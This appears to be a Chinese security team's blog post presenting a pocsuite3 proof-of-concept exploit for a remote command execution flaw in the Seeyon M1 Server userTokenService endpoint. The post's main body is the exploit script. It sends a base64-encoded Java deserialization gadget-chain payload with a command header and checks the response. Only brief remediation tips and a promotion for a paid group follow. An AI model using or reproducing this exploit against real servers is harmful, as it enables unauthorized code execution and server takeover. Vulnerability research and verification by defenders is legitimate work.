01
团队声明
该漏洞为我团队漏洞监测平台发现,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章
仅供学习用途使用。
02
漏洞概述
致远M1移动协同办公管理软件,可以实现在任何时间、任何地点、任何环境都能让用户“轻松、便捷、高效”完成工作。同时,还可以实现PC端、移动端、web端,三端合一,无缝实时覆盖,实现管理无中断。
致远 M1 Server userTokenService 代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个服务器系统。
03
漏洞分析
#!/usr/bin/env python
# coding: utf-8
from pocsuite3.api import (
POCBase, Output, register_poc, logger, requests, OptDict, OptString, VUL_TYPE,
REVERSE_PAYLOAD, POC_CATEGORY
)
class POC(POCBase):
vulID = '1'
version = '1'
author = ['AuthorName']
vulDate = '2023-08-15'
createDate = '2023-08-15'
updateDate = '2023-08-15'
references = ['']
name = 'POC Name'
appPowerLink = ''
appName = 'Application Name'
appVersion = ''
vulType = VUL_TYPE.COMMAND_EXECUTION
desc = '''
Description of the vulnerability.
'''
samples = ['']
install_requires = ['']
pocDesc = '''
How to use the POC.
'''
category = POC_CATEGORY.EXPLOITS.REMOTE
def _verify(self):
result = {}
path = '/esn_mobile_pns/service/userTokenService'
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
'Connection': 'close',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept-Encoding': 'gzip, deflate',
'cmd': '@@@@@echo Test',
}
data = '''{{base64dec(rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABHNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldG
hvZHQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lNZXRob2RxAH4ACnhyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAACnQAGVJGOkpNb2RlbFJlc3VsdHQAG0xqYXZhL2xhbmcvU3RyaW5nO3hwc3EAfgAKc3IAJm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnlUiqsSmzlVCAIAAUwAA21hcHQAQkxqYXZhL2xhbmcvT2JqZWN0O3hwc3IAFGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwc3EAfgAJeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJUcmFuc2Zvcm1lcrN5Y+2Zs1QDAAB4cHcEAAAAAHg=
'''
response = requests.post(self.url + path, headers=headers, data=data)
if response.status_code == 200 and "Test" in response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url + path
result['VerifyInfo']['Payload'] = headers['cmd']
return self.parse_output(result)
def _attack(self):
return self._verify()
def _parse_output(self, output):
parsed_output = Output(self)
if output:
parsed_output.success(output)
else:
parsed_output.fail("Exploit failed. Target is not vulnerable.")
return parsed_output
register_poc(POC)
04
整改意见
①升级到最新版本。
②使用WAF添加规则防止命令执行。
05
加入星球
更多原创工具在知识星球!现在RCS-TEAM安全团队已经入职星球,现在加入享受¥199.00价格并赠送¥109.00 图书一本。
06
关注我们
原文始发于微信公众号(小白嘿课):【工具】致远OA_M1Server_userTokenService远程命令执行漏洞验证工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论